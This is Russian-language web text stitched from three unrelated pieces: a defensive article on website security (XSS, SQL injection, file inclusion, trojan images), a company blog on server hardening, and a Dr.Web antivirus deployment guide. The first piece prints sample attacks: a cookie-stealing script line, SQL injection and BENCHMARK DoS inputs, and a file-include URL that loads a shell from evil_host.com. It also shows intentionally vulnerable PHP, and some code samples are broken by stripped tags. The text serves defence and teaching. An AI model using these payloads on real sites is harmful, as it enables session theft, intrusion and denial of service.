• Будьте нестандартны . Во многих хакерских утилитах, базах уязвимостей часто мелькают пути forum/, gallery/, images/. Очень удобно! Знай админ, половина из них побреется и плюнет на твой сайт, когда сайт твой не расположен в /usr/www, а админка твоя не site.com/admin. Суть такова, если ты не стандартен, то это дополнительные палки в колеса хакеру, который атакует твой сайт. Ему придется добавлять/исправлять в ручную базу/скрипт. А всегда хакер это сможет или захочет? Молодых хакеров "скрипт-кидисов" это точно отпугнет. Вот, например, советы по безопасности PHP

  # Сделать код PHP выглядящим как коды других типов
  AddType application/x-httpd-php .asp .py .pl
  # Сделать код PHP выглядящим как коды неизвестных типов
  AddType application/x-httpd-php .bop .foo .133t
  # Сделать код PHP выглядящим как html
  AddType application/x-httpd-php .html .htm
  

  Эта форма безопасности для PHP через скрытие имеет мало недостатков при небольших затратах. Сами хакеры, описывая свои взломы, пишут что скачивают такое же ПО, что расположено на вашем сервере, с сайта разработчика и смотрят с какими по-умолчанию именами таблиц/ путями/ работает тот или иной движок. Общий смысл в нестандартности - это затянуть процесс взлома, чтобы у хакера "блицкриг" не получился, а чем больше он тянет, тем больше вероятность его обнаружения.

• Уберите версии движков и скриптов на сайте . Это ценная информация, которой должен быть лишен атакер, зная версию они ищут готовые решения для взлома. Сделайте так, чтобы ваши скрипты при ошибках не выводили полезной информации, такой как: путь к скрипту, где случилась ошибка (проблема "раскрытие пути") и сам вывод ошибки.
• Подумайте о необходимости.htaccess . Наличие файлов.htaccess подразумевает, что можно отменить ваши опции заданные в основном конфиге Апача, поверьте, хакеры так и сделают. Если отменить использование.htaccess с помощью директивы "AllowOverride None", то вы получите выигрыш в производительности Апача, так как он не будет просматривать при каждом запросе все каталоги по пути к веб-страничке и повысите безопасность веб-сервера Апач.

Подробнее об атаках на динамическое содержимое (Web-сайт, как частный случай)

• XSS (Cross Site Scripting).
  Межсайтовый скриптинг называется именно XSS, а не CSS, так как CSS это ранняя аббревиатура означающая "каскадные таблицы стилей". Атаки XSS направлены не против сервера, а против пользователей данного сервера. Но радоватся админ не надо! Выглядит атака XSS следующим образом, на сайте есть редактируемые поля на web-странице или параметры скрипта, которые не фильтрируются на конструкции вида , javascript.

  Хакер добавляет в редактируемые поля код на языке программирования установленный на стороне клиента, обычно это Java и VBScript, и этот код становится частью HTML страницы. Когда пользователь посещает такую страницу, его браузер, разбирая страницу, выполняет этот код.
  Что делают хакеры, благодаря XSS?

  • Кража кукисов (cookie, плюшки) - в этих текстовых файликах хранится информация, которую сервер "положил" пользователю для его последущей идентификации. В примере, если вы создадите файл test.html с таким содержимым (напишите его руками сами), то при запуске в браузере, он выведет XSS.
    Уважаемый админ у мя произошла ошибка при посещении сайта
    помогите

    А ведь можно написать скрипт на Java и посерьезнее document.location="адрес приемщика кукисов"+document.cookie. Обычно подобные скрипты пишут на web-почту админу и, используя социальную инженерию, пытаются заставить его прочесть сообщение, чтобы получить его кукисы.

    Если в кукисах нет привязки к IP адресу и дополнительных мер защиты, то подменяют свои кукисы на кукисы админа и пытаются попасть в админку, которая не проверяет логин и пароль и идентифицирует людей только по кукисам.

  • Дефейс сайта (deface - замена стартовой страницы сайта, чаще всего index.html)
  • Троянизация удаленного пользователя. Подбираются свежие эксплойты для браузеров пользователей и при их заходе на уязвимую страницу, поисходит попытка заразить компьютер трояном. Если у пользователя установлен антивирус со свежими базами, то он укажет, на появление в системе троянера. И ваш сайт упадет в глазах пользователя, возможно он больше к вам не придет.
  • DoS. При большом количестве посетителей, скрипт дополнительно будет затребовать еще другие страницы с вашего сервера или с другого, кому-то может быть DoS.

  Решение проблемы:

  • Для блокировки записи html тегов в базу данных из полей ввода информации, применяйте конструкции подобные htmlspecialchars для PHP, которые заменят < на на >, & на & и так далее
    Пример,

    $comment = htmlspecialchars($comment, ENT_QUOTES);
    $query = "insert into guestbook
    (name, location, email, url, comment) values
    ("$name", "$location", "$email", "$url", "$comment")";
    mysql_query($query) or die (mysql_error());

  • Проверяйте и фильтруйте в своих скриптах все параметры, которые вводит пользователь и передающиеся скрипту через адресную строку. Изучите как правильно применять регулярные выражения для разбора поступающих данных. Для своего языка программирования найдите материал, обучающий приемам безопасного программирования.
  • Если вы хотите использовать технологию cookie на своем сайте, то ознакомьтесь с безопасными методами работы с кукисами. Ограничивайте их действия во времени и по IP адресам.
  • Как админ будьте бдительны, когда вас разводят с помощью социальной инженерии. Не забывайте о личной компьютерной безопасности за своим клиентским компьютером.
• SQL injection. SQL инъекция.
  Эта болезнь обозначает, что непроверенный параметр подставляют в SQL запрос, фигурирующий в скрипте. Скрипты, болеющие SQL injection хакер находит простым способом, к значению параметра поставляется кавычка site.com/view.php?id=1" или числовой параметр видоизменяют так site.com/view.php?id=2-1.

  Если подставленная кавычка вызывает "ошибку" (куча сообщений что не выполняется такой-то запрос в таком то скрипте по такому пути), то такой скрипт кандидат на прокачку его далее. Часто злоумышленники пользуются Гугл-хак"ом, запрашивая поисковик примерно такими запросами "site:www.жертва.ru Warning". Поисковик Гугл выдаст некорректные скрипты на вашем сайте, настолько древние, что они были давно уже проиндексированы пауком Гугла.

  Код, не проверяющий значение и страдающий SQL injection

  $id = $_REQUEST["id"];
  $result = mysql_query("SELECT title, text, datenews, author FROM `news` WHERE `id`="$id"");
  

  Теперь представьте что вместо числа, вам подставят "-1 union select null/*" (без кавычек) и тогда ваш запрос превратится

  SELECT title, text, datenews, author FROM `news` WHERE `id`="-1 union select null/*"
  

  То есть, хакер хочет, чтобы помимо вашего запроса выполнился его запрос, объединеный с вашим с помощью директивы union. А дальше хакер будет пытаться составлять другие запросы и, учитывая мощь языка SQL, ничего хорошего это админу не сулит. От дефейса (deface - замена стартовой страницы сайта) до получения прав root на вашем сервере. Хакер так же может провести DoS атаку благодаря SQL injection: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) пара таких запросов и сервер в 100% загрузке процессора надолго.

  Защита от SQL инъекции:

  • Активно используйте такие средства серверов SQL как представления (view) и хранимые процедуры. Это позволит ограничить несанкцианированный доступ к базе данных.
  • Перед тем как передавать в запрос параметр, его нужно проверить на тип (для PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() и is_integer()) и, минимум, закавычить с помощью конструкции типа addslashes для PHP.
  • Все скрипты работают с базой данных от какой-нибудь учетной записью базы данных, уберите у этой учетной записи все привилегии, которые не нужны для работы. Часто хакеры используют команду MySQL (MySQL взят для примера, это касается любого SQL сервера) "LOAD DATA INFILE" для чтения нужных им файлов с сервера и доступных для чтения учетной записи, от которой работает MySQL. Отсюда вывод, отключайте ненужные привилегии для ваших скриптов, такие как FILE, которые нужны для применения команды LOAD DATA INFILE. Принцип "основного минимума" должен быть взят за основу.
  • Системная учетная запись, от которой работает SQL сервер, не должна иметь доступ к страницам сайта и системным файлам сервера.
• Подключение файлов. Include file. Допустим есть страница site.com/getnews.php?file=190607, но автор скрипта, используя include, подключает страницу, без проверок.

  $file = $_REQUEST["file"];
  include($file.".html");
  

  Хакер, вместо 190607 подставит evil_host.com/shell.php и тогда вся адресная строка хакерского браузера будет выглядеть так site.com/postnews.php?file=evil_host.com/shell.php и на вашем сайте у хакера будет свой веб-шел с правами, которыми обладает Apache.

  Защита от подключений файлов:

  • Проверяйте и фильтруйте в своих скриптах все параметры, которые вводит пользователь и передающиеся скрипту через адресную строку. Для своего языка программирования найдите материал, обучающий приемам безопасного программирования.
  • Хакерам очень нравится, когда язык программирования на сайте позволяет запускать системные команды. Следовательно, нужно запретить вызов таких функций в вашем языке программирования, если, конечно, это возможно. Например, в настройках PHP есть возможность указать список "запрещенных" функций с помощью disable_functions в php.ini.
• Троянская картинка
  Если у вас есть на сайте возможность заливать файлы на сервер, будьте готовы к заливке, например, картинки аватары. В картинке в формате JPEG есть понятие метаданные (вспомните куда фотоаппрат записывает информацию при съемке кадра) и в эти метаданные запишут

  
  

  картинку переименуют avatara.jpg.php, для обхода большинства проверок на расширение, и будут использовать site.com/upload_images/avatara.jpg.php?cmd=команды_сервера

  Защита от трояна:

  • Корректно проверяйте расширение файлов. Даже если вы корректно обрабатываете разрешенные файлы, будьте готовы, что картинку из jpg в php, переименуют с помощью другой уязвимости на вашем сайте. Проверяйте наличие в картинке метаданных с помощью функций подобных exif_read_data() в PHP.
  • Запретите средствами своего веб-сервера выполнение языков программирования в каталогах с изображениями. Для этого, просмотрите в конфигах Апача строчки вида "AddType application/x-httpd-", которые связывают языки программирования с расширениями файлов и запретите их выполнение в каталогах с изображениями. Для Apache запрещение выполнение файлов языка PHP будет конструкция

    
    Order deny, allow
    Deny from all
    

  • Для своего языка программирования найдите материал, обучающий приемам безопасного программирования при обработке изображений и корректной заливки их на сервер.

Личное спасибо:

• друг Александр Пупышев ака lynx за критику и советы
• сайт antichat.ru/
• сайт xakep.ru/
• книга Майкл Эбен, Брайан Таймэн. FreeBSD Администрирование: исскуство достижения равновесия
• книга Джоел Скембрей, Стюарт Мак-Клар, Джордж Курц. Секреты хакеров: Безопасность сетей - готовые решения. Второе издание

Другие источники информации о защите:

• Страница справочного руководства в FreeBSD man security содержит описание общих проблем защиты и правильной практики администрирования.
• Подпишитесь на списки рассылки freebsd-security @ freebsd.org. Для этого пошлите письмо по адресу majordomo @ freebsd.org с текстом subscribe freebsd-security в теле сообщения. Именно в этом списке рассылке обсуждается наиболее актуальные проблемы защиты.
• Страница информации о защите FreeBSD freebsd.org/security/
• Документ FreeBSD Security How-To
• Сайт CERT.org содержит информацию об уязвимых местах в защите всех операционных систем.
• Книга "Брандмауэры и защита в Internet" (Firewalls & Internet Security) Уильям Чесвик (William R. Cheswick) и Стивен Беллоуин (Steven M. Bellowin)
• Книга "Построение брандмауэров в Internet" (Building Internet Firewalls, 2nd Edition) Брент Чэпмен (Brent Chapman) и Элизабет Цвики (Elizabeth Zwicky)

Итог:
Я надеюсь, статья помогла вам увидеть все проблемы вместе, теперь админ нужно прочесть о компьютерной безопасности, баз данных, веб серверов, языков программирования из дополнительных источников. Резюмируя кратко статью, нужно быть в курсе новостей о выходе проблем с безопасностью, обновлятся и проверять в своих наработках все входные данные на корректность.
Да прибудет с вами сила!

Невозможно защитить сервер от внешнего доступа раз и навсегда, ведь каждый день обнаруживаются новые уязвимости и появляются новые способы взлома сервера. О защите серверов от несанкционированного доступа мы и расскажем в этой статье.

Сервера любой компании рано или поздно могут стать мишенью для взлома или вирусной атаки. Обычно результатом такой атаки становится потеря данных, репутационный или финансовый ущерб, поэтому вопросам обеспечения безопасности серверов стоит уделить внимание в первую очередь.

Следует понимать, что защита от взлома серверов – это комплекс мер, в том числе подразумевающий постоянный мониторинг работы сервера и работу по совершенствованию защиты. Невозможно защитить сервер от внешнего доступа раз и навсегда, ведь каждый день обнаруживаются новые уязвимости и появляются новые способы взлома сервера.

О защите серверов от несанкционированного доступа мы и расскажем в этой статье.

Способы и методы защиты серверов от несанкционированного доступа Физическая защита сервера

Физическая защита. Желательно, чтобы сервер находился в защищенном ЦОДе, закрытом и охраняемом помещении, у посторонних не должно быть доступа к серверу.

Установите аутентификацию по SSH

При настройке доступа к серверу используйте аутентификацию по ключам SSH вместо пароля, поскольку такие ключи гораздо сложнее, а иногда и попросту невозможно взломать с помощью перебора вариантов.

Если же считаете, что вам все-таки требуется пароль, обязательно ограничьте число попыток его ввода.

Обратите внимание, если при входе вы видите подобное сообщение:

Last failed login: Tue Sep 28 12:42:35 MSK 2017 from 52.15.194.10 on ssh:notty
There were 8243 failed login attempts since the last successful login.

Оно может свидетельствовать, что ваш сервер пытались взломать. В таком случае для настройки безопасности сервера смените порт SSH, ограничьте список IP, с которых возможен доступ к серверу или установите ПО, автоматически блокирующее чрезмерно частую и подозрительную активность.

Регулярно устанавливайте последние обновления

Для обеспечения защиты сервера вовремя устанавливайте последние патчи и обновления серверного ПО, которое используете – операционной системы, гипервизора, сервера баз данных.

Желательно проверять наличие новых патчей, обновлений и сообщения об обнаруженных ошибках / уязвимостях каждый день, чтобы предотвратить атаки, использующие уязвимости нулевого дня. Для этого подпишитесь на новости от компании-разработчика ПО, следите за ее страницами в соцсетях.

Защищайте пароли

До сих пор одним их самых распространенных способов получить доступ к серверу является взлом пароля сервера. Поэтому придерживайтесь общеизвестных, но тем не менее актуальных рекомендаций, чтобы не оставить сервер без защиты:

• не используйте пароли, которые легко подобрать, такие как название компании;
• если вы до сих пор используете дефолтный пароль для консоли администратора – немедленно измените его;
• пароли на разные сервисы должны быть разными;
• если вам необходимо передать пароль кому-либо, никогда не отправляйте IP-адрес, логин и пароль в одном и том же письме или сообщении в мессенджере;
• для входа в учетную запись администратора можно установить двухэтапную аутентификацию.

Файрвол

• Убедитесь, что на сервере есть , он настроен и он работает все время.
• Защищайте и входящий, и исходящий трафик.
• Следите за тем, какие порты открыты и для каких целей, не открывайте ничего лишнего, чтобы снизить число вероятных уязвимых мест для взлома сервера.

В частности, файрвол очень помогает в защите сервера от ddos атак, т.к. можно быстро создавать запрещающие правила файрвола и вносить в них IP-адреса, с которых идет атака, или блокировать доступ к определенным приложениям, по определенным протоколам.

Мониторинг и обнаружение вторжений

• Ограничьте ПО и службы, работающие у вас на сервере. Периодически проверяйте все, что у вас запущено, и если обнаружатся какие-то незнакомые вам процессы, удаляйте их немедленно и начинайте проверку на вирусы.
• Периодически проверяйте наличие следов взлома. О взломе могут свидетельствовать новые учетные записи пользователей, которые вы не создавали, перемещение или удаление файла /etc/syslog.conf , удаленные файлы /etc/shadow и /etc/passwrd .
• Мониторьте работу вашего сервера, следите за его обычной скоростью и пропускной способностью, так вы сможете заметить отклонения, например, когда нагрузка на сервер стала значительно больше обычного.

Использование VPN и шифрования SSL/TLS

Если необходим удаленный доступ к серверу, он должен быть разрешен только с определенных IP-адресов и происходить по VPN.

Следующим этапом обеспечения безопасности может быть настройка SSL, которая позволит не только шифровать данные, но и проверять идентичность других участников сетевой инфраструктуры, выдавая им соответствующие сертификаты.

Проверка безопасности сервера

Хорошей идеей будет самостоятельная проверка безопасности сервера методом пентеста, т.е. моделирование атаки, чтобы найти потенциальные уязвимости и вовремя их ликвидировать. Желательно привлечь к этому специалистов по информационной безопасности, однако некоторые тесты можно проделать и самостоятельно, используя программы для взлома серверов.

Что еще грозит серверам кроме взлома

Сервер может выйти из строя по ряду других причин, кроме взлома. Например, это может быть заражение вредоносным ПО или просто физическая поломка какого-либо из компонентов.

Поэтому мероприятия по защите сервера должны включать:

• Установку и обновление программ для защиты сервера – антивирусов.
• Регулярные зашифрованные копии данных, по меньшей мере, раз в неделю, поскольку, согласно статистике, жесткие диски сервера на первом месте по частоте поломок. Убедитесь, что резервная копия хранится в физически безопасной среде.
• Обеспечение бесперебойного электропитания серверной.
• Своевременная физическая профилактика серверов, включающая их чистку от пыли и замену термопасты.

Опыт специалистов “Интегруса” говорит нам, что лучшая защита от такого рода угроз – это применение лучших практик в области систем защиты серверов.

Для обеспечения безопасности серверов наших заказчиков мы применяем сочетание инструментов:брандмауэры, антивирусы, технологии безопасности / управления событиями (SIM / SEM), технологии обнаружения вторжений / защиты (IDS / IPS), технологии сетевого поведенческого анализа (NBA), конечно же регулярное профилактическое обслуживание серверов и обустройство защищенных серверных под ключ. Это позволяет свести риски взлома или отказа сервера по другим причинам к минимуму.

Готовы провести аудит безопасности серверов вашей компании, провести консультирование специалистов, выполнить все виды работ по настройке защиты серверного оборудования.

Краткая инструкция по развертыванию антивирусной сети:

1. Составьте план структуры антивирусной сети, включите в него все защищаемые компьютеры и мобильные устройства.

Выберите компьютер, который будет выполнять функции Сервера Dr.Web. В состав антивирусной сети может входить несколько Серверов Dr.Web. Особенности такой конфигурации описаны в Руководстве администратора , п. Особенности сети с несколькими Серверами Dr.Web .

Сервер Dr.Web можно установить на любом компьютере, а не только на компьютере, выполняющем функции сервера ЛВС. Основные требованием к этому компьютеру приведены в п. Системные требования . На все защищаемые станции, включая серверы ЛВС, устанавливается одна и та же версия Агента Dr.Web. Отличие составляет список устанавливаемых антивирусных компонентов, определяемый настройками на Сервере.

Для установки Сервера Dr.Web и Агента Dr.Web требуется однократный доступ (физический или с использованием средств удаленного управления и запуска программ) к соответствующим компьютерам. Все дальнейшие действия выполняются с рабочего места администратора антивирусной сети (в том числе, возможно, извне локальной сети) и не требуют доступа к Серверам Dr.Web или рабочим станциям.

2. Согласно составленному плану определите, какие продукты для каких операционных систем потребуется установить на соответствующие узлы сети. Подробная информация по предоставляемым продуктам приведена в разделе Комплект поставки .

Все требуемые продукты могут быть приобретены в виде коробочного решения Dr.Web Enterprise Security Suite или скачаны на веб-сайте компании «Доктор Веб» https://download.drweb.ru/ .

Агенты Dr.Web для станции под ОС Android, ОС Linux, OS X также могут быть установлены из пакетов для автономных продуктов и в дальнейшем подключены к централизованному Серверу Dr.Web. Описание соответствующих настроек Агентов приведено в Руководстве по установке , п. Установка Агента Dr.Web при помощи персонального инсталляционного пакета .

3. Установите основной дистрибутив Сервера Dr.Web на выбранный компьютер или компьютеры. Описание установки приведено в Руководстве по установке , п. Установка Сервера Dr.Web .

Вместе с Сервером устанавливается Центр управления безопасностью Dr.Web.

По умолчанию Сервер Dr.Web запускается автоматически после установки и после каждой перезагрузки операционной системы.

4. Если антивирусная сеть будет включать защищаемые станции под ОС Android, ОС Linux, OS X, установите дополнительный дистрибутив Сервера Dr.Web на все компьютеры с установленным основным дистрибутивом Сервера.

5. При необходимости установите и настройте Прокси-сервер. Описание приведено в Руководстве по установке , п. Установка Прокси-сервера .

6. Для настройки Сервера и антивирусного ПО на станциях необходимо подключиться к Серверу при помощи Центра управления безопасностью Dr.Web.

Центр управления доступен по адресу:

http:// :9080

или

https:// :9081

где в качестве укажите IP-адрес или доменное имя компьютера, на котором установлен Сервер Dr.Web.

Имя администратора по умолчанию – admin .

Пароль:

для ОС Windows – пароль, который был задан при установке Сервера.

для ОС семейства UNIX – root .

При успешном подключении к Серверу откроется главное окно Центра управления (подробное описание см. в Руководстве администратора , в п. Центр управления безопасностью Dr.Web ).

7. Произведите начальную настройку Сервера (подробное описание настроек Сервера приведено в Руководстве администратора , в Главе 8: Настройка Сервера Dr.Web ):

a. В разделе Менеджер лицензий добавьте один или несколько лицензионных ключей и распространите их на соответствующие группы, в частности на группу Everyone . Шаг обязателен, если при установке Сервера не был задан лицензионный ключ.

b. В разделе Общая конфигурация репозитория задайте, какие компоненты антивирусной сети будут обновляться с ВСО Dr.Web. В разделе Состояние репозитория произведите обновление продуктов в репозитории Сервера. Обновление может занять продолжительное время. Дождитесь окончания процесса обновления перед тем как продолжить дальнейшую настройку.

c. На странице Администрирование → Сервер Dr.Web приведена информация о версии Сервера. При наличии новой версии, обновите Сервер как описано в Руководстве администратора , п. Обновление Сервера Dr.Web и восстановление из резервной копии .

d. При необходимости настройте Сетевые соединения для изменения сетевых настроек по умолчанию, используемых для взаимодействия всех компонентов антивирусной сети.

e. При необходимости настройте список администраторов Сервера. Также доступна внешняя аутентификация администраторов. Подробнее см. в Руководстве администратора , в Главе 5: Администраторы антивирусной сети .

f. Перед началом эксплуатации антивирусного ПО рекомендуется изменить настройку каталога резервного копирования критичных данных Сервера (см. Руководство администратора , п. Настройка расписания Сервера Dr.Web ). Данный каталог желательно разместить на другом локальном диске, чтобы уменьшить вероятность одновременной потери файлов ПО Сервера и резервной копии.

8. Задайте настройки и конфигурацию антивирусного ПО для рабочих станций (подробное описание настройки групп и станций приведено в Руководстве администратора , в Главе 6 и Главе 7 ):

a. При необходимости создайте пользовательские группы станций.

b. Задайте настройки группы Everyone и созданных пользовательских групп. В частности настройте раздел устанавливаемых компонентов.

9. Установите ПО Агента Dr.Web на рабочие станции.

В разделе Инсталляционные файлы ознакомьтесь со списком предоставляемых файлов для установки Агента. Выберите подходящий для вас вариант установки, исходя из операционной системы станции, возможности удаленной установки, варианта задания настроек Сервера при установке Агента и т.п. Например:

Если пользователи устанавливают антивирус самостоятельно, воспользуйтесь персональными инсталляционными пакетами, которые создаются через Центр управления отдельно для каждой станции. Данный тип пакетов также возможно отправить пользователям на электронную почту непосредственно из Центра управления. После установки подключение станций к Серверу осуществляется автоматически.

Для удаленной установки по сети на станцию или несколько станций одновременно (только для станций под ОС Windows) воспользуйтесь сетевым инсталлятором. Установка осуществляется через Центр управления с использованием расширения браузера.

Также возможна удаленная установка по сети на станцию или несколько станций одновременно с использованием службы Active Directory. Для этого используется инсталлятор Агента Dr.Web для сетей с Active Directory, поставляемый в комплекте дистрибутива Dr.Web Enterprise Security Suite, но отдельно от инсталлятора Сервера.

Если необходимо уменьшить нагрузку на канал связи между Сервером и станциями в процессе установки, можете воспользоваться полным инсталлятором, который осуществляет установку Агента и компонентов защиты единовременно.

Установка на станции под ОС Android, ОС Linux, OS X может выполняться локально по общим правилам. Также уже установленный автономный продукт может подключаться к Серверу на основе соответствующей конфигурации.

10. Сразу после установки на компьютеры Агенты автоматически устанавливают соединение с Сервером. Авторизация антивирусных станций на Сервере происходит в соответствии с выбранной вами политикой (см. Руководство администратора , п. Политика подключения станций ):

a. При установке из инсталляционных пакетов, а также при настройке автоматического подтверждения на Сервере рабочие станции автоматически получают регистрацию при первом подключении к Серверу, и дополнительное подтверждение не требуется.

b. При установке из инсталляторов и настройке ручного подтверждения доступа администратору необходимо вручную подтвердить новые рабочие станции для их регистрации на Сервере. При этом новые рабочие станции не подключаются автоматически, а помещаются Сервером в группу новичков.

11. После подключения к Серверу и получения настроек, на станцию устанавливается соответствующий набор компонентов антивирусного пакета, заданный в настройках первичной группы станции.

12. Настройка станций и антивирусного ПО возможна также после установки (подробное описание приведено в Руководстве администратора , в Главе 7 ).